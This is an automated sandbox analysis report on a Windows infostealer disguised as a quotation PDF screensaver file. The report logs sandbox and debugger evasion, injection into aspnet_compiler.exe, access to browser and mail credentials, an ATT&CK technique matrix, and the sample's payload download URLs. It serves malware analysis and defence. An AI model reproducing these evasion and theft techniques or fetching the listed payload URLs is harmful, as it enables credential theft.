            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 19068C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 596187
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 596078
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595968
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595859
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595747
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595625
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595516
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595406
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595297
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595188
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread delayed: delay time: 595078
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599890
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599781
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599671
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599562
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599453
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599343
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599234
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599125
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599015
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598906
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598797
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598687
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598576
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598452
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598333
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598156
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597886
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597765
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597656
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597546
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597437
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596999Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596124Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595905Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595792Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595653Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595543Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595387Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Window / User API: threadDelayed 7843
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Window / User API: threadDelayed 1986
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 1841
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 7993
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594187Jump to behavior
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2224780699.00000228FF3E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: explorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware|VIRTUAL|A M I|Xen*select * from Win32_ComputerSystem+manufacturer,model-Microsoft|VMWare|Virtual.john/anna0xxxxxxxx
Source: aspnet_compiler.exe, 00000004.00000002.2959731204.000001904F01A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process information queried: ProcessInformation

            Anti Debugging

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Code function: 0_2_00007FFD9BAB1535 CheckRemoteDebuggerPresent,0_2_00007FFD9BAB1535
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 4EEC0000
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1904EEC0000
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Queries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match, File source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

Source: Yara match, File source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | Scheduled Task/Job (1) | Process Injection (211) | Disable or Modify Tools (1) | OS Credential Dumping (1) | Query Registry (1) | Remote Services | Email Collection (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | Scheduled Task/Job (1) | Virtualization/Sandbox Evasion (51) | LSASS Memory | Security Software Discovery (221) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Process Injection (211) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (2) | NTDS | Virtualization/Sandbox Evasion (51) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Network Configuration Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery (33) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1559133; Sample: QUOTATION_NOVQTRA071244PDF....; Startdate: 20/11/2024; Architecture: WINDOWS; Score: 100
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
Sample-level DNS/IP: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); s24.filetransfer.io; 3 other IPs or domains
Process: QUOTATION_NOVQTRA071244PDF.scr.exe (started)
  DNS/IP: filetransfer.io 188.114.96.3, 443, 49730, 49731 CLOUDFLARENETUS European Union
  DNS/IP: reallyfreegeoip.org 188.114.97.3, 443, 49732, 49740 CLOUDFLARENETUS European Union
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  Process: aspnet_compiler.exe (started by QUOTATION_NOVQTRA071244PDF.scr.exe)
    DNS/IP: checkip.dyndns.com 193.122.6.168, 49739, 49742, 49745 ORACLE-BMC-31898US United States
    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    Process: conhost.exe (started by aspnet_compiler.exe)

Source | Detection | Scanner | Label | Link
QUOTATION_NOVQTRA071244PDF.scr.exe | 37% | ReversingLabs | Win64.Trojan.Znyonm |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.microsoft.coH | 0% | Avira URL Cloud | safe |
https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB | 0% | Avira URL Cloud | safe |
https://s24.filetransfer.io | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s24.filetransfer.io | 188.114.97.3 | true | false | | unknown
filetransfer.io | 188.114.96.3 | true | false | | high
reallyfreegeoip.org | 188.114.97.3 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB | false | Avira URL Cloud: safe | unknown
http://filetransfer.io/data-package/I7fmQg9d/download | false | | high
https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high
https://filetransfer.io/data-package/I7fmQg9d/download | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.microsoft.coH | aspnet_compiler.exe, 00000004.00000002.2960737490.0000019050B9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-neti | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.75p | aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DB6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://filetransfer.io | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-net | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DE4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://filetransfer.io | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://s24.filetransfer.io | QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.97.3 | s24.filetransfer.io | European Union | | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | filetransfer.io | European Union | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559133
Start date and time: 2024-11-20 08:17:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QUOTATION_NOVQTRA071244PDF.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 113
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
